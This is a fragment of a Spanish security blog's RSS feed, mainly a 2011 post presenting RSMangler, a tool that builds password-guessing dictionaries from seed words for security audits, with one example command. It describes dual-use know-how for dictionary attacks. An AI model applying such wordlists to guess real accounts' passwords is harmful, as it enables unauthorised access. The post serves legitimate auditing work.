		<media:content url="http://img90.imageshack.us/img90/2016/redik.png" medium="image" />

		<media:content url="http://img695.imageshack.us/img695/2752/cainyabel.png" medium="image" />

		<media:content url="http://img821.imageshack.us/img821/1497/cainyabel2.png" medium="image" />

		<media:content url="http://img810.imageshack.us/img810/44/cainyabel3.png" medium="image" />

		<media:content url="http://img824.imageshack.us/img824/2118/cainyabel4.png" medium="image" />

		<media:content url="http://img88.imageshack.us/img88/8485/cainyabel5.png" medium="image" />

		<media:content url="http://img109.imageshack.us/img109/6136/cainyabel6.png" medium="image" />

		<media:content url="http://img217.imageshack.us/img217/4206/cainyabel7.png" medium="image" />

		<media:content url="http://img854.imageshack.us/img854/3333/cainyabel8.png" medium="image" />

		<media:content url="http://img703.imageshack.us/img703/1777/cainyabel9.png" medium="image" />

		<media:content url="http://img850.imageshack.us/img850/1500/cainyabel10.png" medium="image" />

		<media:content url="http://img801.imageshack.us/img801/7646/cainyabel11.png" medium="image" />

		<media:content url="http://img88.imageshack.us/img88/1353/cainyabel12.png" medium="image" />

		<media:content url="http://img805.imageshack.us/img805/2372/cainyabel13.png" medium="image" />
	</item>
		<item>
		<title>RSMangler, wordlist generator</title>
		<link>http://seifreed.com/2011/04/17/rsmangler-wordlist-generator/</link>
		<comments>http://seifreed.com/2011/04/17/rsmangler-wordlist-generator/#comments</comments>
		<pubDate>Sun, 17 Apr 2011 11:30:51 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[RSMangler]]></category>
		<category><![CDATA[wordlist]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3140</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Existen diferentes tipos de diccionarios que podemos bajar para poder crear nuestros diccionarios para utilizar en nuestras auditorias. Hay una utilidad muy buena llamada RSmangler, esta utilidad nos permite, a través de una palabra o una lista de palabra en un fichero poder crear diferentes combinaciones. A diferencia de otros [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3140&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Existen diferentes tipos de diccionarios que podemos bajar para poder crear nuestros diccionarios para utilizar en nuestras auditorias.</p>
<p>Hay una utilidad muy buena llamada RSmangler, esta utilidad nos permite, a través de una palabra o una lista de palabra en un fichero poder crear diferentes combinaciones.</p>
<p>A diferencia de otros generadores de diccionarios, con este todas las opciones vienen por defecto activadas. Si queremos excluir una de las combinaciones de palabras que se quieran hacer solo debemos de ponerla en la linea de comandos.</p>
<p>Para descargar RSMangler lo hacemos desde <a class="vt-p" href="http://www.randomstorm.com/rsmangler-security-tool.php">aquí</a></p>
<p>Hagamos un ejemplo de RSMangler, creamos un fichero y lo guardamos con la palabra seifreed, por ejemplo.</p>
<p>Y ahora pasamos RSMangler</p>
<blockquote><p>root@dragon-backtrack:~/rsmangler# ./rsmangler.rb &#8211;file fichero.txt &gt;&gt; fichero_modificado.txt</p></blockquote>
<p>Ahora el fichero que hemos exportado con las modificiones queda de la siguiente manera</p>
<p><a class="vt-p" href="http://pastebin.com/nDs4k8K4">Ver en Pastebin</a></p>
<p>Así que no hay excusa para tener nuestros diccionarios con nuestras palabras.</p>
<p>Un saludo</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/category/software/'>Software</a> Tagged: <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/rsmangler/'>RSMangler</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/wordlist/'>wordlist</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3140/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3140/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3140/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3140&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/04/17/rsmangler-wordlist-generator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
	</channel>
</rss>
